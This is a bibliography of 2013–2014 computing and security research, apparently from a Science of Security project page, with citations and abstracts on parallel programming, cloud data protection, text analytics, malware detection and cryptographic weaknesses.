  • Di Pierro, M., "Portable Parallel Programs with Python and OpenCL," Computing in Science & Engineering , vol.16, no.1, pp.34,40, Jan.-Feb. 2014. (ID#:14-1775) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6655872&isnumber=6756717 Two Python modules are presented: pyOpenCL, a library that enables programmers to write Open Common Language (OpenCL) code within Python programs; and ocl, a Python-to-C converter that lets developers write OpenCL kernels using the Python syntax. Like CUDA, OpenCL is designed to run on multicore GPUs. OpenCL code can also run on other architectures, including ordinary CPUs and mobile devices, always taking advantage of their multicore capabilities. Combining Python, numerical Python (numPy), pyOpenCL, and ocl creates a powerful framework for developing efficient parallel programs that work on modern heterogeneous architectures. Open Common Language (OpenCL) runs on multicore GPUs, as well as other architectures including ordinary CPUs and mobile devices. Combining OpenCL with numerical Python (numPy) and a new module - ocl, a Python-to-C converter that lets developers use Python to write OpenCL kernels - creates a powerful framework for developing efficient parallel programs for modern heterogeneous architectures. Keywords: high level languages; parallel architectures; parallel programming; CUDA; Open Common Language; Python syntax; Python-to-C converter; numPy; numerical Python; ocl; portable parallel program; pyOpenCL; Computer applications; Graphics processing units;Kernel; Multicore processing; Parallel processing; Programming; Scientific computing; GPU; OpenCL; Python; meta-programming; parallel programming; scientific computing
  • Gao, Shanzhen; Chen, Keh-Hsun, "Tackling Markoff-Hurwitz Equations," Computational Science and Computational Intelligence (CSCI), 2014 International Conference on , vol.1, no., pp.341,346, 10-13 March 2014. (ID#:14-1776) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6822132&isnumber=6822065 We present algorithms for searching and generating solutions to the equation x12+x22+ ...+xn2 = kx1x2...xn. Solutions are reported for n = 2, 3,..., 9. Properties of solutions are discussed. We can prove that the solutions do not exist when n=4 and k=2 or 3, n=5 and k=2 or 3. Conjectures based on computational results are discussed. Keywords: Educational institutions; Equations; Indexes; Radio access networks; Scientific computing; Systematics; Time complexity; Markoff and Hurwitz equations; search solution space; solution generator; solution trees
  • Leeser, M.; Mukherjee, S.; Ramachandran, J.; Wahl, T., "Make it real: Effective floating-point reasoning via exact arithmetic," Design, Automation and Test in Europe Conference and Exhibition (DATE), 2014, vol., no., pp.1,4, 24-28 March 2014. (ID#:14-1777) Available at: URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6800331&isnumber=6800201 Floating-point arithmetic is widely used in scientific computing. While many programmers are subliminally aware that floating-point numbers only approximate the reals, few are cognizant of the dangers this entails for programming. Such dangers range from tolerable rounding errors in sequential programs, to unexpected, divergent control flow in parallel code. To address these problems, we present a decision procedure for floating-point arithmetic (FPA) that exploits the proximity to real arithmetic (RA), via a loss-less reduction from FPA to RA. Our procedure does not involve any form of bit-blasting or bit-vectorization, and can thus generate much smaller back-end decision problems, albeit in a more complex logic. This tradeoff is beneficial for the exact and reliable analysis of parallel scientific software, which tends to give rise to large but benignly structured formulas. We have implemented a prototype decision engine and present encouraging results analyzing such software for numerical accuracy. Keywords: floating point arithmetic; parallel programming; software tools; FPA; RA; back-end decision problems; bit blasting; bit vectorization; divergent control flow; floating point arithmetic; floating point reasoning; floating-point-to-real reduction; numerical accuracy; parallel code; parallel scientific software; prototype decision engine ;real arithmetic; rounding errors; scientific computing; sequential programs; structured formulas; Abstracts; Cognition; Encoding; Equations; Floating-point arithmetic; Software; Standards
  • Al-Anzi, Fawaz S.; Salman, Ayed A.; Jacob, Noby K.; Soni, Jyoti, "Towards robust, scalable and secure network storage in Cloud Computing," Digital Information and Communication Technology and it's Applications (DICTAP), 2014 Fourth International Conference on , vol., no., pp.51,55, 6-8 May 2014. (ID#:14-1778) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6821656&isnumber=6821645 The term Cloud Computing is not something that appeared overnight, it may come from the time when computer system remotely accessed the applications and services. Cloud computing is Ubiquitous technology and receiving a huge attention in the scientific and industrial community. Cloud computing is ubiquitous, next generation's in-formation technology architecture which offers on-demand access to the network. It is dynamic, virtualized, scalable and pay per use model over internet. In a cloud computing environment, a cloud service provider offers "house of resources" includes applications, data, runtime, middleware, operating system, virtualization, servers, data storage and sharing and networking and tries to take up most of the overhead of client. Cloud computing offers lots of benefits, but the journey of the cloud is not very easy. It has several pitfalls along the road because most of the services are outsourced to third parties with added enough level of risk. Cloud computing is suffering from several issues and one of the most significant is Security, privacy, service availability, confidentiality, integrity, authentication, and compliance. Security is a shared responsibility of both client and service provider and we believe security must be information centric, adaptive, proactive and built in. Cloud computing and its security are emerging study area nowadays. In this paper, we are discussing about data security in cloud at the service provider end and proposing a network storage architecture of data which make sure availability, reliability, scalability and security. Keywords: Availability; Cloud computing; Computer architecture; Data security; Distributed databases; Servers; Cloud Computing; Data Storage; Data security; RAID
  • Pfarr, F.; Buckel, T.; Winkelmann, A., "Cloud Computing Data Protection -- A Literature Review and Analysis," System Sciences (HICSS), 2014 47th Hawaii International Conference on , vol., no., pp.5018,5027, 6-9 Jan. 2014. (ID#:14-1779) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6759219&isnumber=6758592 Cloud Computing technologies are gaining increased attention both in academia and practice. Despite of its relevance and potential for more IT flexibility and its beneficial effects on costs, legal uncertainties regarding the data processing especially between large economies still exist on the customer and provider side. Against this background, this contribution aims at providing an overview of privacy issues and legal frameworks for data protection in Cloud environments discussed in recent scientific literature. Due to the overall complexity concerning international law, we decided to primarily focus on data traffic between the United States of America and the European Union. The result of our research revealed significant differences in the jurisdiction and consciousness for data protection in these two economies. As a consequence for further Cloud Computing research we identify a large number of problems that need to be addressed. Keywords: cloud computing; data privacy; law; security of data; European Union ;IT flexibility; United States of America; cloud computing; data processing; data protection; data traffic; international law; legal uncertainties; privacy issues; Cloud computing; Data privacy; Data processing; Europe; Law; Standards; Cloud Computing; Data Protection; Literature Review; Privacy
  • You-Wei Cheah (author)and Beth Plale(advisor)," Quality, Retrieval, and Analysis of Provenance in Large Scale Data," doctoral dissertation, Indiana University, 2014. (ID#:14-1780) Available at: http://dl.acm.org/citation.cfm?id=2604558&coll=DL&dl=GUIDE&CFID=496530737&CFTOKEN=65026387 With the popularity of 'Big Data' rising, this paper focuses on provenance (classified by this paper as metadata describing the genealogy of a data product), its role prominent in the reuse and reproduction of scientific results. quality, capture, and representation for large-scale situations. With a framework and method that identifies correctness, completeness, and relevance of data provenance, these dimensions can be analyzed at the node/edge, graph, and multi-graph level. This paper also discusses the creation of a provenance database storing 48,000 provenance traces, including a failure model to address varying types of failures that may occur. Keywords: (not provided)

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Text Analytics

Text Analytics


Text analytics refers to linguistic, statistical, and machine learning techniques that model and structure the information content of textual sources for intelligence, exploratory data analysis, research, or investigation. The research cited here focuses on large volumes of text mined to identify insider threats, intrusions, and malware detection.

  • Heimerl, F.; Lohmann, S.; Lange, S.; Ertl, T., "Word Cloud Explorer: Text Analytics Based on Word Clouds," System Sciences (HICSS), 2014 47th Hawaii International Conference on , vol., no., pp.1833,1842, 6-9 Jan. 2014. (ID#:14-1448) Available at: http://ieeexplore.ieee.org/xpl/articleDetails.jsp?tp=&arnumber=6758829&ranges%3D2013_2014_p_Publication_Year%26queryText%3Dtext+analytics Word clouds have emerged as a straightforward and visually appealing visualization method for text. They are used in various contexts as a means to provide an overview by distilling text down to those words that appear with highest frequency. Typically, this is done in a static way as pure text summarization. We think, however, that there is a larger potential to this simple yet powerful visualization paradigm in text analytics. In this work, we explore the usefulness of word clouds for general text analysis tasks. We developed a prototypical system called the Word Cloud Explorer that relies entirely on word clouds as a visualization method. It equips them with advanced natural language processing, sophisticated interaction techniques, and context information. We show how this approach can be effectively used to solve text analysis tasks and evaluate it in a qualitative user study. Keywords: data visualization; natural language processing; text analysis; context information; natural language processing; sophisticated interaction techniques; text analysis tasks; text analytics; text summarization; visualization method; visualization paradigm; word cloud explorer; word clouds; Context; Layout; Pragmatics; Tag clouds; Text analysis; User interfaces; Visualization; interaction; natural language processing; tag clouds; text analytics; visualization; word cloud explorer; word clouds
  • Atasu, K.; Polig, R.; Hagleitner, C.; Reiss, F.R., "Hardware-accelerated regular expression matching for high-throughput text analytics," Field Programmable Logic and Applications (FPL), 2013 23rd International Conference on , vol., no., pp.1,7, 2-4 Sept. 2013. (ID#:14-1449) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6645534&isnumber=6645482 Advanced text analytics systems combine regular expression (regex) matching, dictionary processing, and relational algebra for efficient information extraction from text documents. Such systems require support for advanced regex matching features, such as start offset reporting and capturing groups. However, existing regex matching architectures based on reconfigurable nondeterministic state machines and programmable deterministic state machines are not designed to support such features. We describe a novel architecture that supports such advanced features using a network of state machines. We also present a compiler that maps the regexs onto such networks that can be efficiently realized on reconfigurable logic. For each regex, our compiler produces a state machine description, statically computes the number of state machines needed, and produces an optimized interconnection network. Experiments on an Altera Stratix IV FPGA, using regexs from a real life text analytics benchmark, show that a throughput rate of 16 Gb/s can be reached. keywords: {field programmable gate arrays; finite state machines; knowledge acquisition; pattern matching; relational algebra; text analysis; Altera Stratix IV FPGA; bit rate 16 Gbit/s; capturing groups; compiler; dictionary processing; hardware-accelerated regular expression matching; high-throughput text analytics; information extraction; optimized interconnection network; programmable deterministic state machines; reconfigurable logic; reconfigurable nondeterministic state machines; regex matching architectures; relational algebra; start offset reporting; text documents; Delays; Dictionaries; Doped fiber amplifiers; Multiprocessor interconnection; Registers; Semantics
  • Polig, R.; Atasu, K.; Hagleitner, C., "Token-based dictionary pattern matching for text analytics," Field Programmable Logic and Applications (FPL), 2013 23rd International Conference on, vol., no., pp.1,6, 2-4 Sept. 2013. (ID#:14-1450) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6645535&isnumber=6645482 When performing queries for text analytics on unstructured text data, a large amount of the processing time is spent on regular expressions and dictionary matching. In this paper we present a compilable architecture for token-bound pattern matching with support for token pattern sequence detection. The architecture presented is capable of detecting several hundreds of dictionaries, each containing thousands of elements at high throughput. A programmable state machine is used as pattern detection engine to achieve deterministic performance while maintaining low storage requirements. For the detection of token sequences, a dedicated circuitry is compiled based on a non-deterministic automaton. A cascaded result lookup ensures efficient storage while allowing multi-token elements to be detected and multiple dictionary hits to be reported. We implemented on an Altera Stratix IV GX530, and were able to process up to 16 documents in parallel at a peak throughput rate of 9.7 Gb/s. Keywords: dictionaries; finite state machines; pattern matching; query processing; text analysis; Altera Stratix IV GX530; cascaded result lookup; compilable architecture; dedicated circuitry; deterministic performance; dictionary detection; dictionary matching; multitoken elements; nondeterministic automaton; pattern detection engine; programmable state machine; text analytics querying; token pattern sequence detection; token sequence detection; token-based dictionary pattern matching; unstructured text data; Automata; Computer architecture; Dictionaries; Doped fiber amplifiers; Engines; Pattern matching; Throughput
  • Dey, L.; Verma, I., "Text-Driven Multi-structured Data Analytics for Enterprise Intelligence," Web Intelligence (WI) and Intelligent Agent Technologies (IAT), 2013 IEEE/WIC/ACM International Joint Conferences on , vol.3, no., pp.213,220, 17-20 Nov. 2013. (ID#:14-1451) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6690731&isnumber=6690661 Text data constitutes the bulk of all enterprise data. Text repositories are not only tacit store-houses of knowledge about its people, projects and processes but also contain invaluable information about its customers, competitors, suppliers, partners and all other stakeholders. Mining this data can provide interesting and valuable insights provided it is appropriately integrated with other enterprise data. In this paper we propose a framework for text-driven analysis of multi-structured data. Keywords: business data processing; competitive intelligence; data analysis; data mining; text analysis; data mining; enterprise data; enterprise intelligence; text data; text driven analysis; text driven multistructured data analytics; text repositories; Business; Context; Media; Natural language processing; Semantics; Text mining; Information Fusion; Text Analytics
  • Agarwal, K.; Polig, R., "A high-speed and large-scale dictionary matching engine for Information Extraction systems," Application-Specific Systems, Architectures and Processors (ASAP), 2013 IEEE 24th International Conference on , vol., no., pp.59,66, 5-7 June 2013. (ID#:14-1452) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6567551&isnumber=6567524 Dictionary matching is a commonly used operation in Information Extraction (IE) systems. It involves matching a set of strings in a document against a dictionary of pre-defined patterns. In this paper, we describe a high performance and scalable hardware architecture to enable high throughput dictionary matching on very large dictionaries for text analytics applications. Our hardware accelerator employs a novel hashing based approach instead of commonly used deterministic finite automata (DFA) based algorithms. A limitation of the DFA based approaches is that they typically process one character every cycle, while the proposed hash based scheme can process a string token every cycle, thus achieving significantly higher processing throughput than the DFA based implementations. Our measurement results based on a prototype implementation on an Altera Stratix IV FPGA device indicate that our hardware dictionary matching engine can process typical document streams at a processing rate of ~1.5GB/s (~12 Gbps) while simultaneously allowing support for large dictionary sizes containing up to ~100K patterns, thus making it very useful for IE workload acceleration. Keywords: dictionaries; field programmable gate arrays; file organization; information retrieval systems; string matching; text analysis; Altera Stratix IV FPGA device; DFA based algorithms; IE systems; IE workload acceleration; deterministic finite automata based algorithms; hardware accelerator; hardware dictionary matching engine; hashing based approach; high throughput dictionary matching; high-speed dictionary matching engine; information extraction system; arge-scale dictionary matching engine; scalable hardware architecture; string matching; string token; text analytics applications; Arrays; Dictionaries; Field programmable gate arrays; Hardware; Pattern matching; Random access memory; Throughput; FPGA; dictionary matching; hardware acceleration; hashing; information extraction; pattern matching; string matching; text analytics
  • Clemons, T.; Faisal, S.M.; Tatikonda, S.; Aggarwal, C.; Parthasarathy, S., "Hash in a flash: Hash tables for flash devices," Big Data, 2013 IEEE International Conference on , vol., no., pp.7,14, 6-9 Oct. 2013. (ID#:14-1453) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6691692&isnumber=6690588 Conservative estimates place the amount of data expected to be created by mankind this year to exceed several thousand exabytes. Given the enormous data deluge, and in spite of recent advances in main memory capacities, there is a clear and present need to move beyond algorithms that assume in-core (main-memory) computation. One fundamental task in Information Retrieval and text analytics requires the maintenance of local and global term frequencies from within large enterprise document corpora. This can be done with a counting hash-table; they associate keys to frequencies. In this paper, we will study the design landscape for the development of such an out-of-core counting hash table targeted at flash storage devices. Flash devices have clear benefits over traditional hard drives in terms of latency of access and energy efficiency. However, due to intricacies in their design, random writes can be relatively expensive and can degrade the life of the flash device. Counting hash tables are a challenging case for the flash drive because this data structure is inherently dependent upon the randomness of the hash function; frequency updates are random and may incur random expensive random writes. We demonstrate how to overcome this challenge by designing a hash table with two related hash functions, one of which exhibits a data placement property with respect to the other. Specifically, we focus on three designs and evaluate the trade-offs among them along the axes of query performance, insert and update times, and I/O time using real-world data and an implementation of TF-IDF. Keywords: data structures; flash memories; TF-IDF; data deluge; data placement property; data structure; energy efficiency; enterprise document corpora; flash storage devices; global term frequencies maintenance; in-core main-memory computation; information retrieval; local term frequencies maintenance; memory capacities; out-of-core counting hash table; query performance; text analytics; Ash; Context; Encyclopedias; Internet; Performance evaluation; Random access memory
  • Zhang, Yan; Ma, Hongtao; Xu, Yunfeng, "An Intelligence Gathering System for Business Based on Cloud Computing," Computational Intelligence and Design (ISCID), 2013 Sixth International Symposium on , vol.1, no., pp.201,204, 28-29 Oct. 2013. (ID#:14-1454) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6804970&isnumber=6804763 With the continued exponential growth in both complexity and volume of unstructured internet data, and enterprises become more automated, data driven and real-time, traditional business intelligence and analytics system meet new challenges. As with the Cloud Computing development, some parallel data analysis systems have been emerging. However, existing systems rarely have comprehensive function, either providing gathering service or data analysis service. Our project needs a comprehensive tool to store and analysis large scale data efficiently. In response to these challenges, a business intelligence gathering system based on Cloud computing is proposed. It supports parallel ETL process, text mining which are based on Hadoop. The demo achieves Chinese Word Segmentation, Bayesian classification algorithm and K-means algorithm in the MapReduce architecture to form the omni bearing and three-dimensional intelligence noumenon for enterprises. It can meet the needs on timeliness and pertinence of the information, or even can achieve real-time intelligence gathering and analytics. Keywords: MapReduce; classification; clustering; hadoop; intelligence gathering
  • Logasa Bogen, P.; Symons, C.T.; McKenzie, A.; Patton, R.M.; Gillen, R.E., "Massively scalable near duplicate detection in streams of documents using MDSH," Big Data, 2013 IEEE International Conference on , vol., no., pp.480,486, 6-9 Oct. 2013. (ID#:14-1455) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6691610&isnumber=6690588 In a world where large-scale text collections are not only becoming ubiquitous but also are growing at increasing rates, near duplicate documents are becoming a growing concern that has the potential to hinder many different information filtering tasks. While others have tried to address this problem, prior techniques have only been used on limited collection sizes and static cases. We will briefly describe the problem in the context of Open Source analysis along with our additional constraints for performance. In this work we propose two variations on Multi-dimensional Spectral Hash (MDSH) tailored for working on extremely large, growing sets of text documents. We analyze the memory and runtime characteristics of our techniques and provide an informal analysis of the quality of the near-duplicate clusters produced by our techniques. Keywords: file organization; information filtering; public domain software; text analysis; MDSH; document stream; information filtering task; large-scale text collections; memory characteristics; multidimensional spectral hash; near duplicate detection; near duplicate documents; near-duplicate clusters; open source analysis; quality informal analysis; runtime characteristics; text documents; Electronic publishing; Encyclopedias; Internet; Memory management; Random access memory; Runtime; Big Data; MDSH; Near Duplicate Detection; Open Source Intelligence; Streaming Text
  • Hung Son Nguyen, "Tolerance Rough Set Model and Its Applications in Web Intelligence," Web Intelligence (WI) and Intelligent Agent Technologies (IAT), 2013 IEEE/WIC/ACM International Joint Conferences on , vol.3, no., pp.237,244, 17-20 Nov. 2013. (ID#:14-1456) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6690734&isnumber=6690661 Tolerance Rough Set Model (TRSM) has been introduced as a tool for approximation of hidden concepts in text databases. In recent years, numerous successful applications of TRSM in web intelligence including text classification, clustering, thesaurus generation, semantic indexing, and semantic search, etc., have been proposed. This paper will review the fundamental concepts of TRSM, some of its possible extensions and some typical applications of TRSM in text mining. Moreover, the architecture o a semantic information retrieval system, called SONCA, will be presented to demonstrate the main idea as well as stimulate the further research on TRSM. Keywords: data mining; information retrieval systems; ontologies (artificial intelligence); rough set theory ;text analysis; SONCA system; TRSM; Web intelligence; clustering; search based on ontologies and compound analytics; semantic indexing; semantic information retrieval system; semantic search; text classification; text databases; text mining; thesaurus generation; tolerance rough set model; Approximation methods; Indexes; Information retrieval; Ontologies; Semantics; Standards; Vectors; Tolerance rough set model; classification; clustering; semantic indexing; semantic search
  • Sundarkumar, G.G.; Ravi, V., "Malware detection by text and data mining," Computational Intelligence and Computing Research (ICCIC), 2013 IEEE International Conference on , vol., no., pp.1,6, 26-28 Dec. 2013. (ID#:14-1457) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6724229&isnumber=6724108 Cyber frauds are a major security threat to the banking industry worldwide. Malware is one of the manifestations of cyber frauds. Malware authors use Application Programming Interface (API) calls to perpetrate these crimes. In this paper, we propose a static analysis method to detect Malware based on API call sequences using text and data mining in tandem. We analyzed the dataset available at CSMINING group. First, we employed text mining to extract features from the dataset consisting a series of API calls. Further, mutual information is invoked for feature selection. Then, we resorted to over-sampling to balance the data set. Finally, we employed various data mining techniques such as Decision Tree (DT), Multi Layer Perceptron (MLP), Support Vector Machine (SVM), Probabilistic Neural Network (PNN) and Group Method for Data Handling (GMDH). We also applied One Class SVM (OCSVM). Throughout the paper, we used 10-fold cross validation technique for testing the techniques. We observed that SVM and OCSVM achieved 100% sensitivity after balancing the dataset. Keywords: {application program interfaces; data mining; decision trees; feature extraction; invasive software; neural nets; support vector machines; text analysis; API call sequences; DT; GMDH; MLP; Malware authors; OCSVM;PNN; SVM; application programming interface; cyber frauds; data mining; decision tree; feature extraction; feature selection; group method for data handling; malware detection;multi layer perceptron; one class SVM; probabilistic neural network; security threat; static analysis method; support vector machine ;text mining; Accuracy; Feature extraction; Malware; Mutual information; Support vector machines; Text mining; Application Programming Interface calls; Data Mining; Mutual Information; Over Sampling; Text Mining
  • V.S. Subrahmanian, Handbook of Computational Approaches to Counterterrorism, Springer Publishing Company, 2013. (ID#:14-1458) Citation available at: http://dl.acm.org/citation.cfm?id=2430713&coll=DL&dl=GUIDE&CFID=339335517&CFTOKEN=38610778 This article invites individuals focused on counter-terrorism in research, academia, and industry to consider the advances in understanding terrorist groups that information technology has allowed. The particular focus of this article is the use of text analytics to anticipate terror group behavior, understand terror networks, and create defensive policies. This work explores the role of mathematics and modern computing as significant contributors to the study of terrorist organizations and groups.


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.



Weaknesses

Weaknesses


Weaknesses Attackers need only find one or a few exploitable vulnerabilities to mount a successful attack while defenders must shore up as many weaknesses as practicable. The research presented here covers a range of weaknesses and approaches for identifying and securing against attacks. Many articles focus on key systems, both public and private.

  • Peter Nose, "Security Weaknesses Of A Signature Scheme And Authenticated Key Agreement Protocols," Information Processing Letters, Volume 114 Issue 3, March, 2014, (Pages 107-115). (ID#:14-1491) Available at:http://dl.acm.org/citation.cfm?id=2564930.2565025&coll=DL&dl=GUIDE&CFID=341995912&CFTOKEN=88342782 or http://dx.doi.org/10.1016/j.ipl.2013.11.005 At ACISP 2012, a novel deterministic identity-based (aggregate) signature scheme was proposed that does not rely on bilinear pairing. The scheme was formally proven to be existentially unforgeable under an adaptive chosen message and identity attack. The security was proven under the strong RSA assumption in the random oracle model. In this paper, unfortunately, we show that the signature scheme is universally forgeable, i.e., an adversary can recover the private key of a user and use it to generate forged signatures on any messages of its choice having on average eight genuine signatures. This means, that realizing a deterministic identity-based signature scheme in composite order groups is still an open problem. In addition, we show that a preliminary version of the authenticated key exchange protocol proposed by Okamoto in his invited talk at ASIACRYPT 2007 is vulnerable to the key-compromise impersonation attack and therefore cannot be secure in the eCK model. We also show that the two-party identity-based key agreement protocol of Holbl et al. is vulnerable to the unknown key-share attack. Keywords: Aggregate signature, Cryptography, Deterministic signature, Identity-based, Key authentication, Two-party key agreement
  • Wenbo Shi, Debiao He, Shuhua Wu, "Cryptanalysis and Improvement Of A Dos-Resistant ID-Based Password Authentication Scheme Without Using Smart Card," International Journal of Information and Communication Technology, Volume 6 Issue 1, November 2014, ( Pages 39-48). (ID#:14-1492) Available at: http://dl.acm.org/citation.cfm?id=2576036.2576040&coll=DL&dl=GUIDE&CFID=341995912&CFTOKEN=88342782 or http://dx.doi.org/10.1504/IJICT.2014.057971 An authentication scheme allows the user and the server to authenticate each other and establish a session key for future communication in an open network. Very recently, Wen et al. proposed a DoS-resistant ID-based password authentication scheme without using smart card. They claimed that their scheme could overcome various attacks. However, in this paper, we will point out that Wen et al.'s scheme is vulnerable to an impersonation attack and a privileged insider attack. To overcome weaknesses, we also propose an improved scheme. The analysis shows our scheme not only overcomes weaknesses in Wen et al.'s scheme but also has better performance. Then our scheme is more suitable for practical applications. Keywords: (not available)
  • Li, B., "Sustainable Value and Generativity in the Ecological Metadata Language (EML) Platform: Toward New Knowledge and Investigations," System Sciences (HICSS), 2014 47th Hawaii International Conference on , vol., no., pp.3533,3542, 6-9 Jan. 2014 (ID#:14-1493) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6759042&isnumber=6758592 This paper examines Ecological Metadata Language (EML) as a generative platform facilitating new ecological research. It reflects on literature about the EML platform, and on the EML platform itself. First, it identifies a substantial gap in literature about use of the EML platform for intended research. Second, it identifies some strengths and weaknesses of the EML platform to support research about variance, process, and configurational theories. Third, it examines the EML platform's strengths and weaknesses in mediating values, particularly those concerning new kinds of ecological research envisioned in EML literature. Finally, it contributes some brief directions for future research, including: expanding notions of valuable (meta) data, of use and of users; articulating clear value; and exploring the morphology of (meta) data. Keywords: XML; data handling; ecology; environmental science computing; meta data; sustainable development; E ML; EML platform; configurational theories; data morphology; ecological metadata language platform; ecological research; process theories; sustainable generativity; sustainable value; variance theories; Biological system modeling; Communities; Context; Environmental factors; Standards; Systematics; XML; Ecological Metadata Language; generativity; knowledge flows; metadata
  • Kushwaha, A.K.S.; Srivastava, R., "Performance Evaluation Of Various Moving Object Segmentation Techniques For Intelligent Video Surveillance System," Signal Processing and Integrated Networks (SPIN), 2014 International Conference on , vol., no., pp.196,201, 20-21 Feb. 2014 (ID#:14-1494) http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6776947&isnumber=6776904 Moving object segmentation is an essential process for many computer vision algorithms. Many different methods have been proposed over the recent years but expert can be confused about their benefits and limitations. In this paper, review and comparative study of various moving object segmentation approaches is presented in terms of qualitative and quantitative performances with the aim of pointing out their strengths and weaknesses, and suggesting new research directions. For evaluation and analysis purposes, the various standard spatial domain methods include as proposed by McFarlane and Schofield [13], Kim et al [18], Oliver et al [27], Liu et al [9], Stauffer and Grimson's [15], Zivkovic [12], Lo and Velastin [25], Cucchiara et al. [26], Bradski [24], and Wren et al. [16]. For quantitative evaluation of these standard methods the various metrics used are RFAM (relative foreground area measure), MP (misclassification penalty), RPM (relative position based measure), and NCC (normalized cross correlation). The strengths and weaknesses of various segmentation approaches are discussed. From the results obtained, it is observed that codebook based segmentation method performs better in comparison to other methods in consideration. Keywords: image classification; image motion analysis; image segmentation; video surveillance; MP; NCC; RFAM; RPM; codebook based segmentation; computer vision algorithms; intelligent video surveillance system; misclassification penalty; moving object segmentation; normalized cross correlation; performance evaluation; quantitative evaluation; relative foreground area measure; relative position based measure; standard methods; standard spatial domain methods; Adaptation models; Area measurement; Computational modeling; Image segmentation; Motion segmentation; Noise; Position measurement; Computer Vision; Motion Analysis; Object Segmentation
  • Jenq-Shiou Leu; Wen-Bin Hsieh, "Efficient And Secure Dynamic ID-Based Remote User Authentication Scheme For Distributed Systems Using Smart Cards," Information Security, IET , vol.8, no.2, pp.104,113, March 2014 (ID#:14-1495) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6748544&isnumber=6748540 User authentication is a basic concern for distributed environments. Strong remote user authentication schemes are important to ensure security. This paper offers a scheme useful for Smart Cards.
  • Berger, M.; Erlacher, F.; Sommer, C.; Dressler, F., "Adaptive Load Allocation For Combining Anomaly Detectors Using Controlled Skips," Computing, Networking and Communications (ICNC), 2014 International Conference on , vol., no., pp.792,796, 3-6 Feb. 2014 (ID#:14-1496) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6785438&isnumber=6785290 Traditional Intrusion Detection Systems (IDS) can be complemented by an Anomaly Detection Algorithm (ADA) to also identify unknown attacks. We argue that, as each ADA has its own strengths and weaknesses, it might be beneficial to rely on multiple ADAs to obtain deeper insights. ADAs are very resource intensive; thus, real-time detection with multiple algorithms is even more challenging in high-speed networks. To handle such high data rates, we developed a controlled load allocation scheme that adaptively allocates multiple ADAs on a multi-core system. The key idea of this concept is to utilize as many algorithms as possible without causing random packet drops, which is the typical system behavior in overload situations. We developed a proof of concept anomaly detection framework with a sample set of ADAs. Our experiments confirm that the detection performance can substantially benefit from using multiple algorithms and that the developed framework is also able to cope with high packet rates. keywords: multiprocessing systems; real-time systems; resource allocation; security of data; ADA; IDS; adaptive load allocation; anomaly detection algorithm; controlled load allocation; controlled skips; high-speed networks; intrusion detection systems; multicore system; multiple algorithms; real-time detection; resource intensive; unknown attacks; High-speed networks; Intrusion detection; Probabilistic logic; Reliability; Uplink; World Wide Web
  • Okhravi, Hamed; Hobson, Thomas; Bigelow, David; Streilein, William, "Finding Focus in the Blur of Moving-Target Techniques," Security & Privacy, IEEE , vol.12, no.2, pp.16,26, Mar.-Apr. 2014 (ID#:14-1498) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6673500&isnumber=6798534 Protecting critical systems and assets against cyberattacks is an ever more difficult challenge that strongly favors attackers. Whereas defenders must protect a large, diverse set of cybersystems containing an unknown number of vulnerabilities of various types, attackers need only find one or a few exploitable vulnerabilities to mount a successful attack. One promising approach that can shift the balance in the defenders' favor is to create uncertainty for attackers by dynamically changing system properties in what is called a cyber moving target (MT). MT techniques seek to randomize system components to reduce the likelihood of a successful attack, add dynamics to a system to reduce the lifetime of an attack, and diversify otherwise homogeneous collections of systems to limit the damage of a large-scale attack. In this article, the authors review the five dominant domains of MT techniques available today as research prototypes and commercial solutions. They present the techniques' strengths and weaknesses and make recommendations for future research that will improve current capabilities. Keywords: Computer crime; Computer security; Dynamic programming; IP networks; Network security; Ports (Computers); Runtime environment; Software engineering; Target tracking; ASLR; cyber moving target; dynamic data; dynamic network; dynamic platform; dynamic runtime environment; dynamic software; moving target; reconnaissance
  • Orman, H., "Recent Parables in Cryptography," Internet Computing, IEEE , vol.18, no.1, pp.82,86, Jan.-Feb. 2014 (ID#:14-1499) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6756867&isnumber=6756719 The annual CRYPTO conference held in August 2013 generated several discussions about developments in cryptography. The author states that hash functions play an important cryptography by supplying a nearly number to any piece of data. The years since MD5's weaknesses became known have led to an unsettled feeling about how to design hash functions. Keywords: cryptography; CRYPTO conference; cryptography developments; hash functions; Cryptography; Internet; NIST; Network security; Diffie-Hellman; cryptography; malware
